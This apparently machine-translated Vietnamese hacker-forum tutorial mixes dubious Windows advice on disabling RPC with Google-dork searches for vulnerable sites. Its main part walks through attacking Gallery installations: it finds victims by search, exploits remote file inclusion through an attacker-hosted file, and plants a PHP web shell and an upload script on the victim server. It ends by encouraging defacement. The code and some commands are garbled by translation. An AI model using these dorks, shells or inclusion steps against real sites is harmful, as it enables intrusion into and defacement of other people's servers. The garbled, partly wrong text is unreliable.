When installing Windows NT, Microsoft Locator is automatically selected as the name service provider. It is the most optimal service name provider on a Windows NT network environment.
If you suspect that your computer is being hacked or monitored by the remote desktop, you just need to turn off the remote procedure call, currently there is no program that can remote desktop to track you.It also prevents most tools from entering the machine (because most tools write connect based on remote procedure call (over tcp / ip). Most trojans also rely on this protocol.
How to turn off: You go to service / remote procedure call (right click) select starup typt / disable or manual / apply.
This is a very effective way of fighting against a PC, adding a shortcut to file sharing is difficult to hack, but it is troublesome for you on the LAN because you won't be able to run the programs involved. this device.Depending on how you work, you have a reasonable choice.In my opinion, if you use a LAN, install a firewall that is definitely relatively safe.
(Based on the brother's article 'Life as a potato' Khoaimi - admin of HVA)
According to the list of Hacking Exposed 3 books, to hack a normal Web site, we do the following steps:
Depending on your knowledge and level, a hacker will skip any step.It is not necessary to follow the sequence.Remember the sentence 'know who knows me hundred wins'.
(Documents of HVA and hackervn.net)
You probably know specialized websites to search for information online? But you probably did not expect that we could use those sites to find faulty Web sites (I often use google.com and recommend that you use this site because it is very powerful and effective.
You are interested in web page errors and want to find them you just need to go to google.com and type the error after 'allinurl:'. For example, we have the following Web page error code:
cgi-bin / php.cgi? / etc / passwd
You will type: 'allinurl: cgi-bin / php.cgi? / Etc / passwd'
It will list these error-prone Web pages for you, so look down at the bottom of each listing (the green address line) if the line is the same as the keyword you entered then the page. that is or is in error.Whether or not you have hacked into it depends on whether the site has fixed this error or not.
You are interested in forum errors, you want to find this forum form to practice, just enter " powered by" keyword .The following is for finding Snitz 2000:powered forum by Snitz 2000.
However, finding the right forum or website that is faulty in such a way that the probability is not high, please consider the special string in the featured URL for each type of website or forum (this is very important, Please find out more by yourself.For example, if you find a Hosting Controller error, you will have the following feature: "/ admin or / advadmin or / hosting".Let'stype the keyword:
allinurl: / advadmin or allinurl: / admin or allinurl: / hosting
It will list Web pages with URLs like: http://tentrangweb.com/advadmin or http://tentrangweb.com/admin or http://tentrangweb.com/hosting.
For UBB forum, there is a special section: " cgi-bin / ultimatebb.cgi?"
We also look similar to above. As long as you know how to find it, you only need to follow the update on the HVA 'Security Errors' page posted by LeonHart every day, so you will understand their meaning and check it yourself.
Gallery is a tool for creating a photo gallery on the web written in PHP, taking advantage of this loophole we can take advantage of to write in addition a PHP code that allows us to upload, which is our main purpose.
First of all, register for a free host, it is best to register at brinkster.com for ease. Then open notepad and create a PHP file with the following code:
CODE
global $ PHP_SELF;
echo "
";
set_magic_quotes_runtime (1);
if ($ act == "shell") {
echo "nnnnnnnnnnnnnnnnnnnnnnnn ";
system ($ shell);
echo "nnnnnnnnnnnnnnnnnnnnnnnn ";}
echo "";
? >
In this code, create 2 files with different names (but the same code) and name it:
Create a PHP file with the following code:
CODE
function handleupload () {
if (is_uploaded_file ($ _ FILES ['userfile'] ['tmp_name'])) {
$ filename = $ _FILES ['userfile'] ['tmp_name'];
print "$ filename was uploaded successfuly";
$ realname = $ _FILES ['userfile'] ['name'];
print "realname is $ realnamen";
in "đang tạo tập tin vào thư mục đăng tải". $ realname;
copy ($ _ FILES ['userfile'] ['tmp_name'], * PATH *. $ realna me); // note * PATH * we will change it later
} else {
echo "Possible file upload attack: filename". $ _ FILES ['userfile'] ['name']. ".";
}
}
if ($ act == "upload") {
handleupload ();
}
echo "
File:
";
? >
Name it upload.php, which will be used to upload to the victim's Web site.
Next, go to Google, type "Powered by gallery" and then Enter, Google will list a bunch of sites using Gallery, please select any one page and use the following link to try to see if it still has Gallery error:
http:/// victim website> /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /
If you see a rectangular box at the top, its right is a 'Go' transition box as if you found the object. Now you can type the command through that rectangle to hack the victim's Web.
First, type the command 'pwd' to determine the absolute path to the current directory and then press the 'Go' button, when it gives you a quick note of the link below (I'll use VD The path I found is '/ home / abc / xyz / gallery').
Then you type the command '| s –a |' to list its subdirectories. Now that you look at the results, you will see a bunch of subdirectories that we have listed. Keep in mind that our goal is to find a directory that can be used to upload the upload.php file that we have prepared in advance so please identify with me by looking at the last words of each row. result:
Now go to your host account, edit the contents of the init.php file like the code of upload.php file, but edit * PATH * to '/ home / abc / xyz / gallery / loveyou /'.Also prepare an upload.php file on your computer with * PATH * is '' (2 quotation marks).
Now that we can upload the upload.php file to the victim's Web site, enter the following address in your Web browser:
http:/// victim website> /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /
You will see a rectangular frame appear next to it and there are 2 command buttons next to it, one is the 'brown' button, the other is the 'upload' button.The 'brown' button you use will lead to the file upload.php address you have prepared on your computer, the 'upload' button when you click it will upload the upload.php file to the victim's Web site.Ok, now it looks like you have completed the hacking process.From now on you use to attack opponents such as database, password (do the same as the previous hack tutorials), but you should only practice but do not delete the database or destroy their Web.If you are a true hacker, you only need to upload the web page with the words: 'Hack by …… .' is enough.
Like the previous times, whether or not you succeed depends on your luck and perseverance to research your knowledge.
(Based on instructions for hacking vnofear - viethacker.net)
GOODLUCK !!!!!!!!!!!!
(Out of part 4)
Anhdenday
HVAonline.net